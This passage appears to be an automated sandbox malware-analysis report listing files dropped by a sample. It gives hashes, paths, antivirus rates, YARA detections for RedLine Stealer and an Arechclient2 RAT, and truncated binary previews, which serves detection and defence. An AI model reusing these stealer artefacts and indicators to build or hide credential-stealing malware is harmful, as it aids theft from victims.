                                                                                                                                                                                                                            SHA-512:41826B3C11DCB8AFEBE057B7A7604DCF4DDD0FA0EF99AB71479BF13B6A74E87C6D3E90FF50966B2450C093B5AE5B667037ED8664912EA731D4D96B008B0539F9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<...>...?...?...>.......+...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.......{.......\...P...h...P...l...K...Q...M...^...l...K...?...?...?...?...?...?...?...?...?...?...?...|...V...S...z...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...|...Z...v...^...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.......{...c...M...Y..z...M...H...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...I...........?...?...?...?...?...?...?...?...?...?...
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):545792
                                                                                                                                                                                                                            Entropy (8bit):6.384805269039956
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
                                                                                                                                                                                                                            MD5:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                                                                                            SHA1:D5927B38A32E30AFCF5A658612A8266476FC4AD8
                                                                                                                                                                                                                            SHA-256:64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
                                                                                                                                                                                                                            SHA-512:355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 38%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):786944
                                                                                                                                                                                                                            Entropy (8bit):6.809298494568767
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
                                                                                                                                                                                                                            MD5:5AEBA331CE853D10C82B56ADC96C9E80
                                                                                                                                                                                                                            SHA1:A208059F9591712ABF451114815B693AB14A5AB3
                                                                                                                                                                                                                            SHA-256:EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
                                                                                                                                                                                                                            SHA-512:5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\cqecfsbe, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\cqecfsbe, Author: Joe Security
                                                                                                                                                                                                                            • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\cqecfsbe, Author: ditekSHen
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 61%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.3.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4296
                                                                                                                                                                                                                            Entropy (8bit):5.495524771889749
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:Ueuyvyq62zU8wscRBvWP4P4PNPNPNPePePVcuPf6C:N6q62zU8wscRBvWP4P4PNPNPNPePePV5
                                                                                                                                                                                                                            MD5:CBE3E153E492885F8AFA9D9D89073ACA
                                                                                                                                                                                                                            SHA1:2235D9B25A7DB93F41A115AED859E720A8285ADD
                                                                                                                                                                                                                            SHA-256:F4CAB423932DD6895F659B379F7B294E315B99E7269C16A2A43C0175E0A79F69
                                                                                                                                                                                                                            SHA-512:755D322796066C3938196D9FA417AE6C153C0783A63D72EA2C4CD057A7285BB1984BE070F6223C300F6CC985510A211CEB309372B8915AA9436951FCCFADB235
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:[04/25/24 09:04:06] Main : OS Version = osWin10...[04/25/24 09:04:06] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/25/24 09:04:08] Installer Target URL request = {"IPAddress":"192.168.2.4","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/25/24 09:04:09] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/25/24 09:04:09] DownloadAndLaunchInstaller : Creating BITS download handler...[04/25/24 09:04:09] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/25/24 09:04:14] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/25/24 09:04:14] DownloadAndLaunchInstaller : Target folder ="C:\User
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):786944
                                                                                                                                                                                                                            Entropy (8bit):6.809298494568767
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
                                                                                                                                                                                                                            MD5:5AEBA331CE853D10C82B56ADC96C9E80
                                                                                                                                                                                                                            SHA1:A208059F9591712ABF451114815B693AB14A5AB3
                                                                                                                                                                                                                            SHA-256:EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
                                                                                                                                                                                                                            SHA-512:5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, Author: Joe Security
                                                                                                                                                                                                                            • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, Author: ditekSHen
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 61%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):279040
                                                                                                                                                                                                                            Entropy (8bit):5.691181002891515
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:69UdJ5A7opLXtkOUqBvJUVrHnS4AAhbg5ORfpZVNMWEGwe:LtSwDtkOntJURHSn23RRvOcD
                                                                                                                                                                                                                            MD5:A0E6719CEB3DC236283AB59B7F39B058
                                                                                                                                                                                                                            SHA1:32AF73BD4AFBB1EB7B12026082E60DBE3366793C
                                                                                                                                                                                                                            SHA-256:096985879331F9E67FD4BFA6816197610CBFB0F2E8E17D60331D567F4D74056C
                                                                                                                                                                                                                            SHA-512:D51E5B2CD6514C9E464C139AD556F0EB83C29DE3EE09E8F0919E90B871DE340DD0A3FF2C0F166A0DEA6F7B3A5DD2922C9696651C2F58D873A63B58ED88B21F57
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 43%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............X...X...X.SX...X.EX...X.BX...X.).X...X...X...X.LX...X.RX...X.WX...XRich...X........PE..L...."Od............................L.............@..........................p..............................................LB..<.......h...............................................................................x............................text............................... ..`.rdata.............................@..@.data...."~..P...(...8..............@....rsrc...h............`..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3884863
                                                                                                                                                                                                                            Entropy (8bit):7.9982714074161665
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:98304:7goFFJ7lj6j1elkeoTNxPxDZhAryYACWcTIxlN+ba:7guJ7wpfTDPxD0P2YG
                                                                                                                                                                                                                            MD5:78D3CA6355C93C72B494BB6A498BF639
                                                                                                                                                                                                                            SHA1:2FA4E5DF74BFE75C207C881A1B0D3BC1C62C8B0E
                                                                                                                                                                                                                            SHA-256:A1DD547A63B256AA6A16871ED03F8B025226F7617E67B8817A08444DF077B001
                                                                                                                                                                                                                            SHA-512:1B2DF7BEE2514AEE7EFD3579F5DD33C76B40606D07DBA69A34C45747662FAD61174DB4931BCA02B058830107959205E889FEE74F8CCC9F6E03F9FD111761F4EA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:PK.........?.X........I......bunch.dat\]...:.... "*...T.......N<wf..X $;.e..)....|u]+...U*V.~.....f.Rje.......@.f.r..V....J-.#U...*..=.T..E.5.Z..&..z...'.k..%..Je.....[5.....P..B...@........G..z[*.-B1....Jz#....%.J...j...W........>62.jK(...........E.T.Q}.j._I..R.TEj.>..O.*.:J%o.......`.f+O...W>.....S.INC.m.6..|wQ.xk.K.....o.D....:.n4....P>..*M._|...P.R@.gW...k..X...MbM.....H....... .....#o.CC.!...1!R.g....Qc "P....Q.3.H.B.F.|...)...........@..W.6..Z..7.9.....d'`_.6.zr%a.....*.7.,...l....h.v......P.O.f..!..Y..#..Y.7..g..v=..k....J...N#\.5.....]......<.VGU.~....,..X.o.k..#..?v..%.0.+...m.(m..ah.JG>.....m..V......kb...B.jX...V$p... ..?.<....^...%KA=0\.(......Q.l>.;x..#W.@@.tIU ...Q............./e.7Ew..}h..^N... ........+.........bRz.........2r.f..u'o..s.}1...j.{.'%.......?..Z..M.....9.|P..W.o...c...3....H\.4..B......;14.65.Q3....24$...2(..9j......!.$..<<....P#b..Lj.D.vG.+.}.T..6tR..b."..o.f...h>.*......Z..5.(....]........
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1640960
                                                                                                                                                                                                                            Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                            MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                            SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                            SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                            SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 13%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1329417
                                                                                                                                                                                                                            Entropy (8bit):7.898171122766659
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
                                                                                                                                                                                                                            MD5:1E8237D3028AB52821D69099E0954F97
                                                                                                                                                                                                                            SHA1:30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
                                                                                                                                                                                                                            SHA-256:9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
                                                                                                                                                                                                                            SHA-512:A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1596416
                                                                                                                                                                                                                            Entropy (8bit):6.46619614175955
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                            MD5:10D51BECD0BBCE0FAB147FF9658C565E
                                                                                                                                                                                                                            SHA1:4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
                                                                                                                                                                                                                            SHA-256:7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
                                                                                                                                                                                                                            SHA-512:29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2469936
                                                                                                                                                                                                                            Entropy (8bit):6.434916453080517
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                                                                                            MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                            SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                                                                                            SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                                                                                            SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):87278
                                                                                                                                                                                                                            Entropy (8bit):4.38402884518968
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
                                                                                                                                                                                                                            MD5:A723BF46048E0BFB15B8D77D7A648C3E
                                                                                                                                                                                                                            SHA1:8952D3C34E9341E4425571E10F22B782695BB915
                                                                                                                                                                                                                            SHA-256:B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
                                                                                                                                                                                                                            SHA-512:CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4866096
                                                                                                                                                                                                                            Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                            MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                            SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                            SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                            SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe, Author: Joe Security
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Thu Apr 25 06:04:03 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
